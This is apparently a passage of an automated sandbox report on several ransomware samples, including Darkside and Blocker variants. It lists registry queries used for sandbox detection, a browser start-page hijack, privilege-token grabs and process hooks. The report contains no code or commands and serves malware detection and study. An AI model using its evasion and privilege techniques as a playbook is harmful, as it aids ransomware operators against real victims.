cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Blocker.iejl-c5e89f11b69c341b2747cea88413225465ab655fe2b212a7a5006e5dd1eb345f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
cmd.exeattrib.exepid Process 696 cmd.exe 8608 attrib.exe -
Checks SCSI registry key(s) 3 TTPs 10 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
taskmgr.exetaskmgr.exeSUPERAntiSpyware.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 SUPERAntiSpyware.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID SUPERAntiSpyware.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 SUPERAntiSpyware.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID SUPERAntiSpyware.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exedescription ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies Control Panel 1 IoCs
Processes:
Trojan-Ransom.Win32.Darkside.k-17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exedescription ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\Desktop\WallpaperStyle = "10" Trojan-Ransom.Win32.Darkside.k-17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe -
Modifies Internet Explorer start page 1 TTPs 1 IoCs
Processes:
VHO-Trojan-Ransom.Win32.Blocker.gen-fd2fffd46e1c59e974719fa411cebe4f9e0f2177d489a93158ece32eb96afe28.exedescription ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page = "http://www.2345.com/?k563039790" VHO-Trojan-Ransom.Win32.Blocker.gen-fd2fffd46e1c59e974719fa411cebe4f9e0f2177d489a93158ece32eb96afe28.exe -
Modifies registry class 64 IoCs
Processes:
REGSVR32.EXESUPERAntiSpyware.exeTrojan-Ransom.Win32.Darkside.k-17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exedescription ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{746C91D0-C4A9-460A-B841-851A2B6F2C4B}\ = "SUPERAntiSpywareContextMenuExtension" REGSVR32.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\SUPERAntiSpywareContextMenuExt.SASCon.1\ = "SASContextMenu Class" REGSVR32.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CA8ACAFA-5FBB-467B-B348-90DD488DE003}\Version\ = "1.0" REGSVR32.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\SUPERAntiSpywareContextMenuExt.SASConte\ = "SASContextMenu Class" SUPERAntiSpyware.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\f875121f\DefaultIcon Trojan-Ransom.Win32.Darkside.k-17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\SUPERAntiSpywareContextMenuExt.SASConte\CLSID\ = "{CA8ACAFA-5FBB-467B-B348-90DD488DE003}" REGSVR32.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SUPERAntiSpywareContextMenuExt.SASConte\CurVer REGSVR32.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CA8ACAFA-5FBB-467B-B348-90DD488DE003}\ProgID SUPERAntiSpyware.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CA8ACAFA-5FBB-467B-B348-90DD488DE003}\Version SUPERAntiSpyware.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CA8ACAFA-5FBB-467B-B348-90DD488DE003}\Control REGSVR32.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\{CA8ACAFA-5FBB-467B-B348-90DD488DE003}\ = "SUPERAntiSpyware Context Menu" SUPERAntiSpyware.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{746C91D0-C4A9-460A-B841-851A2B6F2C4B} REGSVR32.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CA8ACAFA-5FBB-467B-B348-90DD488DE003}\TypeLib REGSVR32.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\SASCTXMN.DLL\AppID = "{746C91D0-C4A9-460A-B841-851A2B6F2C4B}" SUPERAntiSpyware.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\SUPERAntiSpywareContextMenuExt.SASConte\CurVer\ = "SUPERAntiSpywareContextMenuExt.SASCon.1" SUPERAntiSpyware.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{58DC9F6D-69A0-46d3-84EF-70AE0F108A07} SUPERAntiSpyware.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.f875121f\ = "f875121f" Trojan-Ransom.Win32.Darkside.k-17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CA8ACAFA-5FBB-467B-B348-90DD488DE003}\Control SUPERAntiSpyware.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\SUPERAntiSpywareContextMenuExt.SASConte\ = "SASContextMenu Class" REGSVR32.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CA8ACAFA-5FBB-467B-B348-90DD488DE003}\ProgID\ = "SUPERAntiSpywareContextMenuExt.SASCon.1" REGSVR32.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{209D651D-9AAE-47B4-AD74-16A8F03ACDDB}\1.0 REGSVR32.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{209D651D-9AAE-47B4-AD74-16A8F03ACDDB}\1.0\0 REGSVR32.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{209D651D-9AAE-47B4-AD74-16A8F03ACDDB}\1.0\HELPDIR REGSVR32.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CA8ACAFA-5FBB-467B-B348-90DD488DE003}\ = "SASContextMenu Class" SUPERAntiSpyware.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CA8ACAFA-5FBB-467B-B348-90DD488DE003} REGSVR32.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CA8ACAFA-5FBB-467B-B348-90DD488DE003}\InprocServer32\ = "C:\\Program Files\\SUPERAntiSpyware\\SASCTXMN64.DLL" REGSVR32.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\SUPERAntiSpywareContextMenuExt.SASCon.1\CLSID\ = "{CA8ACAFA-5FBB-467B-B348-90DD488DE003}" SUPERAntiSpyware.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CA8ACAFA-5FBB-467B-B348-90DD488DE003}\AppID = "{746C91D0-C4A9-460A-B841-851A2B6F2C4B}" SUPERAntiSpyware.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CA8ACAFA-5FBB-467B-B348-90DD488DE003}\ToolboxBitmap32 SUPERAntiSpyware.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CA8ACAFA-5FBB-467B-B348-90DD488DE003}\TypeLib\ = "{209D651D-9AAE-47B4-AD74-16A8F03ACDDB}" SUPERAntiSpyware.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\SUPERAntiSpywareContextMenuExt.SASConte\CurVer\ = "SUPERAntiSpywareContextMenuExt.SASCon.1" REGSVR32.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{A42DCBB4-CBAE-4593-BB45-39CAD8F2CF19}\TypeLib REGSVR32.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CA8ACAFA-5FBB-467B-B348-90DD488DE003}\Programmable SUPERAntiSpyware.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CA8ACAFA-5FBB-467B-B348-90DD488DE003}\MiscStatus REGSVR32.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A42DCBB4-CBAE-4593-BB45-39CAD8F2CF19}\ = "ISASContextMenu" REGSVR32.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\f875121f Trojan-Ransom.Win32.Darkside.k-17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CA8ACAFA-5FBB-467B-B348-90DD488DE003}\InprocServer32 SUPERAntiSpyware.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CA8ACAFA-5FBB-467B-B348-90DD488DE003}\Version SUPERAntiSpyware.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CA8ACAFA-5FBB-467B-B348-90DD488DE003}\InprocServer32\ThreadingModel = "Apartment" REGSVR32.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{A42DCBB4-CBAE-4593-BB45-39CAD8F2CF19} REGSVR32.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{A42DCBB4-CBAE-4593-BB45-39CAD8F2CF19}\TypeLib\Version = "1.0" REGSVR32.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SUPERAntiSpywareContextMenuExt.SASConte REGSVR32.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CA8ACAFA-5FBB-467B-B348-90DD488DE003}\AppID = "{746C91D0-C4A9-460A-B841-851A2B6F2C4B}" REGSVR32.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{209D651D-9AAE-47B4-AD74-16A8F03ACDDB}\1.0\FLAGS\ = "0" REGSVR32.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{A42DCBB4-CBAE-4593-BB45-39CAD8F2CF19}\TypeLib\ = "{209D651D-9AAE-47B4-AD74-16A8F03ACDDB}" REGSVR32.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\{CA8ACAFA-5FBB-467B-B348-90DD488DE003} SUPERAntiSpyware.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CA8ACAFA-5FBB-467B-B348-90DD488DE003}\ProgID SUPERAntiSpyware.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{A42DCBB4-CBAE-4593-BB45-39CAD8F2CF19}\ProxyStubClsid32 REGSVR32.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CA8ACAFA-5FBB-467B-B348-90DD488DE003}\MiscStatus\1\ = "131473" REGSVR32.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\SUPERAntiSpywareContextMenuExt.SASConte\CLSID\ = "{CA8ACAFA-5FBB-467B-B348-90DD488DE003}" SUPERAntiSpyware.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{58DC9F6D-69A0-46d3-84EF-70AE0F108A07}\ThreadID = "1731429347" SUPERAntiSpyware.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\SUPERAntiSpywareContextMenuExt.SASCon.1\CLSID\ = "{CA8ACAFA-5FBB-467B-B348-90DD488DE003}" REGSVR32.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A42DCBB4-CBAE-4593-BB45-39CAD8F2CF19} REGSVR32.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\{CA8ACAFA-5FBB-467B-B348-90DD488DE003} SUPERAntiSpyware.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CA8ACAFA-5FBB-467B-B348-90DD488DE003}\MiscStatus\1 SUPERAntiSpyware.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CA8ACAFA-5FBB-467B-B348-90DD488DE003}\MiscStatus SUPERAntiSpyware.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{209D651D-9AAE-47B4-AD74-16A8F03ACDDB} REGSVR32.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A42DCBB4-CBAE-4593-BB45-39CAD8F2CF19}\TypeLib\Version = "1.0" REGSVR32.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\{CA8ACAFA-5FBB-467B-B348-90DD488DE003} SUPERAntiSpyware.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SUPERAntiSpywareContextMenuExt.SASConte\CLSID REGSVR32.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CA8ACAFA-5FBB-467B-B348-90DD488DE003}\ = "SASContextMenu Class" REGSVR32.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CA8ACAFA-5FBB-467B-B348-90DD488DE003}\VersionIndependentProgID SUPERAntiSpyware.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CA8ACAFA-5FBB-467B-B348-90DD488DE003} SUPERAntiSpyware.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.f875121f Trojan-Ransom.Win32.Darkside.k-17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe -
Runs .reg file with regedit 2 IoCs
Processes:
regedit.exeregedit.exepid Process 6284 regedit.exe 7296 regedit.exe -
Runs net.exe
-
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 785 SASDef_GetDescriptor -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
taskmgr.exetaskmgr.exepowershell.exepid Process 1840 taskmgr.exe 1840 taskmgr.exe 1840 taskmgr.exe 1840 taskmgr.exe 1840 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 1120 powershell.exe 1120 powershell.exe 1120 powershell.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
Processes:
7zFM.exetaskmgr.exeVHO-Trojan-Ransom.Win32.Foreign.gen-9f43b7e551446a58daff45fbbf75f884f0b5b16c095f17c92bb5e27344556784.exepid Process 4808 7zFM.exe 4696 taskmgr.exe 5576 VHO-Trojan-Ransom.Win32.Foreign.gen-9f43b7e551446a58daff45fbbf75f884f0b5b16c095f17c92bb5e27344556784.exe -
Suspicious behavior: LoadsDriver 3 IoCs
Processes:
pid Process 672 672 672 -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
Processes:
msedge.exepid Process 5732 msedge.exe 5732 msedge.exe 5732 msedge.exe 5732 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
7zFM.exetaskmgr.exetaskmgr.exepowershell.exeHEUR-Trojan-Ransom.MSIL.Generic-1b46e9135a7abba77ef12257fd426d59318b73bee61b01a7d880123ec0a78557.exeWMIC.exeTrojan-Ransom.Win32.Darkside.k-17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exepowershell.exevssvc.exeadd.exepowershell.exeiexplorer.exeSUPERAntiSpywarePro.exedescription pid Process Token: SeRestorePrivilege 4808 7zFM.exe Token: 35 4808 7zFM.exe Token: SeSecurityPrivilege 4808 7zFM.exe Token: SeDebugPrivilege 1840 taskmgr.exe Token: SeSystemProfilePrivilege 1840 taskmgr.exe Token: SeCreateGlobalPrivilege 1840 taskmgr.exe Token: SeDebugPrivilege 4696 taskmgr.exe Token: SeSystemProfilePrivilege 4696 taskmgr.exe Token: SeCreateGlobalPrivilege 4696 taskmgr.exe Token: 33 1840 taskmgr.exe Token: SeIncBasePriorityPrivilege 1840 taskmgr.exe Token: SeDebugPrivilege 1120 powershell.exe Token: SeDebugPrivilege 4688 HEUR-Trojan-Ransom.MSIL.Generic-1b46e9135a7abba77ef12257fd426d59318b73bee61b01a7d880123ec0a78557.exe Token: SeIncreaseQuotaPrivilege 6280 WMIC.exe Token: SeSecurityPrivilege 6280 WMIC.exe Token: SeTakeOwnershipPrivilege 6280 WMIC.exe Token: SeLoadDriverPrivilege 6280 WMIC.exe Token: SeSystemProfilePrivilege 6280 WMIC.exe Token: SeSystemtimePrivilege 6280 WMIC.exe Token: SeProfSingleProcessPrivilege 6280 WMIC.exe Token: SeIncBasePriorityPrivilege 6280 WMIC.exe Token: SeCreatePagefilePrivilege 6280 WMIC.exe Token: SeBackupPrivilege 6280 WMIC.exe Token: SeRestorePrivilege 6280 WMIC.exe Token: SeShutdownPrivilege 6280 WMIC.exe Token: SeDebugPrivilege 6280 WMIC.exe Token: SeSystemEnvironmentPrivilege 6280 WMIC.exe Token: SeRemoteShutdownPrivilege 6280 WMIC.exe Token: SeUndockPrivilege 6280 WMIC.exe Token: SeManageVolumePrivilege 6280 WMIC.exe Token: 33 6280 WMIC.exe Token: 34 6280 WMIC.exe Token: 35 6280 WMIC.exe Token: 36 6280 WMIC.exe Token: SeIncreaseQuotaPrivilege 6608 Trojan-Ransom.Win32.Darkside.k-17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe Token: SeSecurityPrivilege 6608 Trojan-Ransom.Win32.Darkside.k-17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe Token: SeTakeOwnershipPrivilege 6608 Trojan-Ransom.Win32.Darkside.k-17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe Token: SeLoadDriverPrivilege 6608 Trojan-Ransom.Win32.Darkside.k-17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe Token: SeSystemProfilePrivilege 6608 Trojan-Ransom.Win32.Darkside.k-17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe Token: SeSystemtimePrivilege 6608 Trojan-Ransom.Win32.Darkside.k-17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe Token: SeProfSingleProcessPrivilege 6608 Trojan-Ransom.Win32.Darkside.k-17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe Token: SeIncBasePriorityPrivilege 6608 Trojan-Ransom.Win32.Darkside.k-17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe Token: SeCreatePagefilePrivilege 6608 Trojan-Ransom.Win32.Darkside.k-17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe Token: SeBackupPrivilege 6608 Trojan-Ransom.Win32.Darkside.k-17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe Token: SeRestorePrivilege 6608 Trojan-Ransom.Win32.Darkside.k-17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe Token: SeShutdownPrivilege 6608 Trojan-Ransom.Win32.Darkside.k-17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe Token: SeDebugPrivilege 6608 Trojan-Ransom.Win32.Darkside.k-17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe Token: SeSystemEnvironmentPrivilege 6608 Trojan-Ransom.Win32.Darkside.k-17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe Token: SeRemoteShutdownPrivilege 6608 Trojan-Ransom.Win32.Darkside.k-17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe Token: SeUndockPrivilege 6608 Trojan-Ransom.Win32.Darkside.k-17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe Token: SeManageVolumePrivilege 6608 Trojan-Ransom.Win32.Darkside.k-17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe Token: 33 6608 Trojan-Ransom.Win32.Darkside.k-17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe Token: 34 6608 Trojan-Ransom.Win32.Darkside.k-17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe Token: 35 6608 Trojan-Ransom.Win32.Darkside.k-17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe Token: 36 6608 Trojan-Ransom.Win32.Darkside.k-17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe Token: SeDebugPrivilege 7348 powershell.exe Token: SeBackupPrivilege 920 vssvc.exe Token: SeRestorePrivilege 920 vssvc.exe Token: SeAuditPrivilege 920 vssvc.exe Token: SeDebugPrivilege 9096 add.exe Token: SeDebugPrivilege 404 powershell.exe Token: SeDebugPrivilege 1452 iexplorer.exe Token: SeTakeOwnershipPrivilege 7324 SUPERAntiSpywarePro.exe Token: SeTakeOwnershipPrivilege 7324 SUPERAntiSpywarePro.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
7zFM.exetaskmgr.exetaskmgr.exepid Process 4808 7zFM.exe 4808 7zFM.exe 1840 taskmgr.exe 1840 taskmgr.exe 1840 taskmgr.exe 1840 taskmgr.exe 1840 taskmgr.exe 1840 taskmgr.exe 1840 taskmgr.exe 1840 taskmgr.exe 1840 taskmgr.exe 1840 taskmgr.exe 1840 taskmgr.exe 1840 taskmgr.exe 1840 taskmgr.exe 1840 taskmgr.exe 1840 taskmgr.exe 1840 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 1840 taskmgr.exe 4696 taskmgr.exe 1840 taskmgr.exe 4696 taskmgr.exe 1840 taskmgr.exe 1840 taskmgr.exe 1840 taskmgr.exe 1840 taskmgr.exe 1840 taskmgr.exe 1840 taskmgr.exe 1840 taskmgr.exe 1840 taskmgr.exe 1840 taskmgr.exe 1840 taskmgr.exe 1840 taskmgr.exe 4696 taskmgr.exe 1840 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
taskmgr.exetaskmgr.exepid Process 1840 taskmgr.exe 1840 taskmgr.exe 1840 taskmgr.exe 1840 taskmgr.exe 1840 taskmgr.exe 1840 taskmgr.exe 1840 taskmgr.exe 1840 taskmgr.exe 1840 taskmgr.exe 1840 taskmgr.exe 1840 taskmgr.exe 1840 taskmgr.exe 1840 taskmgr.exe 1840 taskmgr.exe 1840 taskmgr.exe 1840 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 1840 taskmgr.exe 4696 taskmgr.exe 1840 taskmgr.exe 4696 taskmgr.exe 1840 taskmgr.exe 1840 taskmgr.exe 1840 taskmgr.exe 1840 taskmgr.exe 1840 taskmgr.exe 1840 taskmgr.exe 1840 taskmgr.exe 1840 taskmgr.exe 1840 taskmgr.exe 1840 taskmgr.exe 1840 taskmgr.exe 4696 taskmgr.exe 1840 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe -
Suspicious use of SetWindowsHookEx 11 IoCs
Processes:
HEUR-Trojan-Ransom.Win32.Encoder.gen-2033f858574da1fa877ecac8e84be8fa27fb2d352f8254f8187cd305993bebdf.exeHEUR-Trojan-Ransom.Win32.Generic-c082e6069bcaefeb04a9e3cb1c5478b7d5df82b07534367e2081e33207f61138.exeHEUR-Trojan-Ransom.MSIL.Generic-1b46e9135a7abba77ef12257fd426d59318b73bee61b01a7d880123ec0a78557.exetpvpyme.exeiexplorer.exeVHO-Trojan-Ransom.Win32.Blocker.gen-fd2fffd46e1c59e974719fa411cebe4f9e0f2177d489a93158ece32eb96afe28.exeSUPERAntiSpyware.exepid Process 2412 HEUR-Trojan-Ransom.Win32.Encoder.gen-2033f858574da1fa877ecac8e84be8fa27fb2d352f8254f8187cd305993bebdf.exe 3512 HEUR-Trojan-Ransom.Win32.Generic-c082e6069bcaefeb04a9e3cb1c5478b7d5df82b07534367e2081e33207f61138.exe 4688 HEUR-Trojan-Ransom.MSIL.Generic-1b46e9135a7abba77ef12257fd426d59318b73bee61b01a7d880123ec0a78557.exe 4688 HEUR-Trojan-Ransom.MSIL.Generic-1b46e9135a7abba77ef12257fd426d59318b73bee61b01a7d880123ec0a78557.exe 1676 tpvpyme.exe 1452 iexplorer.exe 9012 VHO-Trojan-Ransom.Win32.Blocker.gen-fd2fffd46e1c59e974719fa411cebe4f9e0f2177d489a93158ece32eb96afe28.exe 9012 VHO-Trojan-Ransom.Win32.Blocker.gen-fd2fffd46e1c59e974719fa411cebe4f9e0f2177d489a93158ece32eb96afe28.exe 1676 tpvpyme.exe 4636 SUPERAntiSpyware.exe 4636 SUPERAntiSpyware.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
